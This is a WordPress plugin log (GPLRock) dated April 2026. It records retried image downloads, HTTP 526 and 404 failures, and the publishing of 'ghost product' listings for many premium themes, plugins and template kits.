Image download failed for product glider-3d-photo-slider-wordpress-plugin-v110 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:17 UTC] GPLRock: Image download failed for product glider-3d-photo-slider-wordpress-plugin-v110 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:54:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glider-3d-photo-slider-wordpress-plugin-v110-20169.webp for product glider-3d-photo-slider-wordpress-plugin-v110 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:54:19 UTC] GPLRock WARNING: Image download failed for product glider-3d-photo-slider-wordpress-plugin-v110. URL: https://meldwp.com/wp-content/uploads/glider-3d-photo-slider-wordpress-plugin-v110-20169.webp [05-Apr-2026 02:54:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glider-3d-photo-slider-wordpress-plugin-v110 [05-Apr-2026 02:54:19 UTC] GPLRock: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:00:29 UTC] GPLRock: Image downloaded successfully for product decor-furniture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82805d52.webp [05-Apr-2026 03:00:29 UTC] GPLRock: Using pre-downloaded image for product decor-furniture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82805d52.webp [05-Apr-2026 03:00:29 UTC] GPLRock: Ghost product published with image - Product ID: decor-furniture-interior-design-elementor-template-kit [05-Apr-2026 03:00:30 UTC] GPLRock: Image downloaded successfully for product dayana-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fb9360a.webp [05-Apr-2026 03:00:30 UTC] GPLRock: Using pre-downloaded image for product dayana-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fb9360a.webp [05-Apr-2026 03:00:30 UTC] GPLRock: Ghost product published with image - Product ID: dayana-resume-elementor-template-kit [05-Apr-2026 03:00:32 UTC] GPLRock: Image downloaded successfully for product datapro-creativ-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72f26227.webp [05-Apr-2026 03:00:32 UTC] GPLRock: Using pre-downloaded image for product datapro-creativ-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72f26227.webp [05-Apr-2026 03:00:32 UTC] GPLRock: Ghost product published with image - Product ID: datapro-creativ-agency-elementor-template-kit [05-Apr-2026 03:00:33 UTC] GPLRock: Image downloaded successfully for product dataload-data-science-analytics-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98fd6f57.webp [05-Apr-2026 03:00:33 UTC] GPLRock: Using pre-downloaded image for product dataload-data-science-analytics-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98fd6f57.webp [05-Apr-2026 03:00:33 UTC] GPLRock: Ghost product published with image - Product ID: dataload-data-science-analytics-elementor-template-kit [05-Apr-2026 03:00:35 UTC] GPLRock: Image downloaded successfully for product darona-covid-19-social-awareness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c5e1a69.jpg [05-Apr-2026 03:00:35 UTC] GPLRock: Using pre-downloaded image for product darona-covid-19-social-awareness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c5e1a69.jpg [05-Apr-2026 03:00:35 UTC] GPLRock: Ghost product published with image - Product ID: darona-covid-19-social-awareness-elementor-template-kit [05-Apr-2026 03:00:37 UTC] GPLRock: Image downloaded successfully for product darmali-construction-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cf1f42b.webp [05-Apr-2026 03:00:37 UTC] GPLRock: Using pre-downloaded image for product darmali-construction-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cf1f42b.webp [05-Apr-2026 03:00:37 UTC] GPLRock: Ghost product published with image - Product ID: darmali-construction-template-kit [05-Apr-2026 03:00:38 UTC] GPLRock: Image downloaded successfully for product darik-fashion-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6b705ae.webp [05-Apr-2026 03:00:38 UTC] GPLRock: Using pre-downloaded image for product darik-fashion-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6b705ae.webp [05-Apr-2026 03:00:38 UTC] GPLRock: Ghost product published with image - Product ID: darik-fashion-woocommerce-elementor-template-kit [05-Apr-2026 03:00:39 UTC] GPLRock: Image downloaded successfully for product darcy-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e87a02a1.webp [05-Apr-2026 03:00:40 UTC] GPLRock: Using pre-downloaded image for product darcy-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e87a02a1.webp [05-Apr-2026 03:00:40 UTC] GPLRock: Ghost product published with image - Product ID: darcy-creative-agency-elementor-template-kit [05-Apr-2026 03:00:41 UTC] GPLRock: Image downloaded successfully for product dankuy-cafe-coffee-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57c4131b.webp [05-Apr-2026 03:00:41 UTC] GPLRock: Using pre-downloaded image for product dankuy-cafe-coffee-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57c4131b.webp [05-Apr-2026 03:00:41 UTC] GPLRock: Ghost product published with image - Product ID: dankuy-cafe-coffee-shop-elementor-template-kit [05-Apr-2026 03:00:42 UTC] GPLRock: Image downloaded successfully for product danish-personal-portfolio-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49fa7ffa.webp [05-Apr-2026 03:00:42 UTC] GPLRock: Using pre-downloaded image for product danish-personal-portfolio-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49fa7ffa.webp [05-Apr-2026 03:00:42 UTC] GPLRock: Ghost product published with image - Product ID: danish-personal-portfolio-resume-elementor-template-kit [05-Apr-2026 03:04:27 UTC] GPLRock: Image download failed for product neoton-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:29 UTC] GPLRock: Image download failed for product neoton-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neoton---news-magazine-wordpress-theme-4730.webp for product neoton-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:04:31 UTC] GPLRock: Image download failed for product neoton-news-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:33 UTC] GPLRock: Image download failed for product neoton-news-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neoton---news-magazine-wordpress-theme-4730.webp for product neoton-news-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:04:35 UTC] GPLRock WARNING: Image download failed for product neoton-news-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/neoton---news-magazine-wordpress-theme-4730.webp [05-Apr-2026 03:04:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neoton-news-magazine-wordpress-theme [05-Apr-2026 03:04:36 UTC] GPLRock: Image download failed for product caleader-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:38 UTC] GPLRock: Image download failed for product caleader-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caleader---car-dealer-wordpress-theme-7078.webp for product caleader-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:04:40 UTC] GPLRock: Image download failed for product caleader-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:42 UTC] GPLRock: Image download failed for product caleader-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:04:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/caleader---car-dealer-wordpress-theme-7078.webp for product caleader-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:04:44 UTC] GPLRock WARNING: Image download failed for product caleader-car-dealer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/caleader---car-dealer-wordpress-theme-7078.webp [05-Apr-2026 03:04:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: caleader-car-dealer-wordpress-theme [05-Apr-2026 03:04:44 UTC] GPLRock: Image download failed for product ascen-childcare-kids-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:14:32 UTC] GPLRock: Image downloaded successfully for product booster-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b10a9b2c.jpg [05-Apr-2026 03:14:32 UTC] GPLRock: Using pre-downloaded image for product booster-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b10a9b2c.jpg [05-Apr-2026 03:14:32 UTC] GPLRock: Ghost product published with image - Product ID: booster-digital-marketing-elementor-template-kit [05-Apr-2026 03:14:34 UTC] GPLRock: Image downloaded successfully for product herrington-business-consulting-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8d16fdd.png [05-Apr-2026 03:14:34 UTC] GPLRock: Using pre-downloaded image for product herrington-business-consulting-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8d16fdd.png [05-Apr-2026 03:14:34 UTC] GPLRock: Ghost product published with image - Product ID: herrington-business-consulting-wordpress-theme [05-Apr-2026 03:14:36 UTC] GPLRock: Image downloaded successfully for product meditest-health-care-medical-hospital-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a483001.jpg [05-Apr-2026 03:14:36 UTC] GPLRock: Using pre-downloaded image for product meditest-health-care-medical-hospital-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a483001.jpg [05-Apr-2026 03:14:36 UTC] GPLRock: Ghost product published with image - Product ID: meditest-health-care-medical-hospital-theme [05-Apr-2026 03:14:38 UTC] GPLRock: Image downloaded successfully for product profecient-multipurpose-elementor-business-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db197f15.png [05-Apr-2026 03:14:38 UTC] GPLRock: Using pre-downloaded image for product profecient-multipurpose-elementor-business-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-db197f15.png [05-Apr-2026 03:14:38 UTC] GPLRock: Ghost product published with image - Product ID: profecient-multipurpose-elementor-business-woocommerce-wordpress-theme [05-Apr-2026 03:14:40 UTC] GPLRock: Image downloaded successfully for product leven-best-cv-resume-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-903daaa4.png [05-Apr-2026 03:14:40 UTC] GPLRock: Using pre-downloaded image for product leven-best-cv-resume-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-903daaa4.png [05-Apr-2026 03:14:40 UTC] GPLRock: Ghost product published with image - Product ID: leven-best-cv-resume-wordpress-theme [05-Apr-2026 03:14:42 UTC] GPLRock: Image downloaded successfully for product maia-jewelry-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5784a48.png [05-Apr-2026 03:14:42 UTC] GPLRock: Using pre-downloaded image for product maia-jewelry-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5784a48.png [05-Apr-2026 03:14:42 UTC] GPLRock: Ghost product published with image - Product ID: maia-jewelry-shop-wordpress-theme [05-Apr-2026 03:14:44 UTC] GPLRock: Image downloaded successfully for product gravity-forms-nested-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90ba3878.jpg [05-Apr-2026 03:14:44 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-nested-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90ba3878.jpg [05-Apr-2026 03:14:44 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-nested-forms [05-Apr-2026 03:14:45 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-export-pro-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7d969ce.jpg [05-Apr-2026 03:14:45 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-export-pro-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7d969ce.jpg [05-Apr-2026 03:14:45 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-export-pro-premium [05-Apr-2026 03:14:48 UTC] GPLRock: Image download failed for product powerpack-elements-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 03:14:52 UTC] GPLRock: Image download failed for product powerpack-elements-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 03:14:56 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/PowerPack-Elements-for-Elementor.jpg for product powerpack-elements-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 03:14:58 UTC] GPLRock: Image download failed for product powerpack-elements-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 03:15:02 UTC] GPLRock: Image download failed for product powerpack-elements-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 03:15:06 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/PowerPack-Elements-for-Elementor.jpg for product powerpack-elements-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 03:15:06 UTC] GPLRock WARNING: Image download failed for product powerpack-elements-for-elementor. URL: https://www.gplrock.com/wp-content/uploads/2020/07/PowerPack-Elements-for-Elementor.jpg [05-Apr-2026 03:15:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: powerpack-elements-for-elementor [05-Apr-2026 03:15:07 UTC] GPLRock: Image downloaded successfully for product jetpopup-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14a717e9.png [05-Apr-2026 03:15:08 UTC] GPLRock: Using pre-downloaded image for product jetpopup-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14a717e9.png [05-Apr-2026 03:15:08 UTC] GPLRock: Ghost product published with image - Product ID: jetpopup-for-elementor [05-Apr-2026 03:15:34 UTC] GPLRock: Image downloaded successfully for product css-igniter-amaryllis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4a4bcd3.jpg [05-Apr-2026 03:15:34 UTC] GPLRock: Using pre-downloaded image for product css-igniter-amaryllis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4a4bcd3.jpg [05-Apr-2026 03:15:34 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-amaryllis-wordpress-theme [05-Apr-2026 03:15:36 UTC] GPLRock: Image downloaded successfully for product legacy-white-label-wordpress-admin-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d070e9ae.jpg [05-Apr-2026 03:15:36 UTC] GPLRock: Using pre-downloaded image for product legacy-white-label-wordpress-admin-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d070e9ae.jpg [05-Apr-2026 03:15:36 UTC] GPLRock: Ghost product published with image - Product ID: legacy-white-label-wordpress-admin-theme [05-Apr-2026 03:15:38 UTC] GPLRock: Image downloaded successfully for product mythemeshop-video-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0006c432.jpg [05-Apr-2026 03:15:38 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-video-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0006c432.jpg [05-Apr-2026 03:15:38 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-video-wordpress-theme [05-Apr-2026 03:15:40 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-job-tags-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fe9ba27.jpg [05-Apr-2026 03:15:40 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-job-tags-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fe9ba27.jpg [05-Apr-2026 03:15:40 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-job-tags-addon [05-Apr-2026 03:15:41 UTC] GPLRock: Image downloaded successfully for product css-igniter-technico-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45f5703d.jpg [05-Apr-2026 03:15:41 UTC] GPLRock: Using pre-downloaded image for product css-igniter-technico-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45f5703d.jpg [05-Apr-2026 03:15:41 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-technico-wordpress-theme [05-Apr-2026 03:15:43 UTC] GPLRock: Image downloaded successfully for product email-customizer-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ae40b4c.jpg [05-Apr-2026 03:15:43 UTC] GPLRock: Using pre-downloaded image for product email-customizer-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ae40b4c.jpg [05-Apr-2026 03:15:43 UTC] GPLRock: Ghost product published with image - Product ID: email-customizer-for-woocommerce [05-Apr-2026 03:15:44 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-affiliates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da86ebf9.jpg [05-Apr-2026 03:15:44 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-affiliates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da86ebf9.jpg [05-Apr-2026 03:15:44 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-affiliates [05-Apr-2026 03:15:46 UTC] GPLRock: Image downloaded successfully for product mythemeshop-viral-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4bbd4bb.jpg [05-Apr-2026 03:15:46 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-viral-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4bbd4bb.jpg [05-Apr-2026 03:15:46 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-viral-wordpress-theme [05-Apr-2026 03:15:47 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-help-scout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e283f92.jpg [05-Apr-2026 03:15:48 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-help-scout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e283f92.jpg [05-Apr-2026 03:15:48 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-help-scout [05-Apr-2026 03:15:49 UTC] GPLRock: Image downloaded successfully for product yith-deals-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1792bec.jpg [05-Apr-2026 03:15:49 UTC] GPLRock: Using pre-downloaded image for product yith-deals-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1792bec.jpg [05-Apr-2026 03:15:49 UTC] GPLRock: Ghost product published with image - Product ID: yith-deals-for-woocommerce-premium [05-Apr-2026 03:16:33 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:35 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/our-mission---charity-wordpress-theme-32787.webp for product our-mission-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:38 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:40 UTC] GPLRock: Image download failed for product our-mission-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/our-mission---charity-wordpress-theme-32787.webp for product our-mission-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:42 UTC] GPLRock WARNING: Image download failed for product our-mission-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/our-mission---charity-wordpress-theme-32787.webp [05-Apr-2026 03:16:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: our-mission-charity-wordpress-theme [05-Apr-2026 03:16:42 UTC] GPLRock: Image download failed for product exhibz-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:44 UTC] GPLRock: Image download failed for product exhibz-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exhibz--event-conference-wordpress-theme-32365.webp for product exhibz-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:47 UTC] GPLRock: Image download failed for product exhibz-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:49 UTC] GPLRock: Image download failed for product exhibz-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exhibz--event-conference-wordpress-theme-32365.webp for product exhibz-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:51 UTC] GPLRock WARNING: Image download failed for product exhibz-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/exhibz--event-conference-wordpress-theme-32365.webp [05-Apr-2026 03:16:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exhibz-event-conference-wordpress-theme [05-Apr-2026 03:16:51 UTC] GPLRock: Image download failed for product ah-personal-creative-resume-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:53 UTC] GPLRock: Image download failed for product ah-personal-creative-resume-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ah-personal---creative-resume--blog-theme-15625.webp for product ah-personal-creative-resume-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:55 UTC] GPLRock: Image download failed for product ah-personal-creative-resume-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:57 UTC] GPLRock: Image download failed for product ah-personal-creative-resume-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:16:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ah-personal---creative-resume--blog-theme-15625.webp for product ah-personal-creative-resume-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:16:59 UTC] GPLRock WARNING: Image download failed for product ah-personal-creative-resume-blog-theme. URL: https://meldwp.com/wp-content/uploads/ah-personal---creative-resume--blog-theme-15625.webp [05-Apr-2026 03:16:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ah-personal-creative-resume-blog-theme [05-Apr-2026 03:17:00 UTC] GPLRock: Image download failed for product spheral-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:02 UTC] GPLRock: Image download failed for product spheral-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spheral---creative-agency--portfolio-wordpress-theme-29154.webp for product spheral-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:04 UTC] GPLRock: Image download failed for product spheral-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:06 UTC] GPLRock: Image download failed for product spheral-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spheral---creative-agency--portfolio-wordpress-theme-29154.webp for product spheral-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:08 UTC] GPLRock WARNING: Image download failed for product spheral-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spheral---creative-agency--portfolio-wordpress-theme-29154.webp [05-Apr-2026 03:17:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spheral-creative-agency-portfolio-wordpress-theme [05-Apr-2026 03:17:08 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:10 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seabreeze---restaurant-and-cafe-wordpress-theme-2384.webp for product seabreeze-restaurant-and-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:13 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:15 UTC] GPLRock: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seabreeze---restaurant-and-cafe-wordpress-theme-2384.webp for product seabreeze-restaurant-and-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:17 UTC] GPLRock WARNING: Image download failed for product seabreeze-restaurant-and-cafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seabreeze---restaurant-and-cafe-wordpress-theme-2384.webp [05-Apr-2026 03:17:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seabreeze-restaurant-and-cafe-wordpress-theme [05-Apr-2026 03:17:17 UTC] GPLRock: Image download failed for product artizani-handmade-artists-and-artisans-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:19 UTC] GPLRock: Image download failed for product artizani-handmade-artists-and-artisans-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artizani---handmade-artists-and-artisans-wordpress-theme-17202.webp for product artizani-handmade-artists-and-artisans-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:21 UTC] GPLRock: Image download failed for product artizani-handmade-artists-and-artisans-wordpress-theme (attempt 1/3). 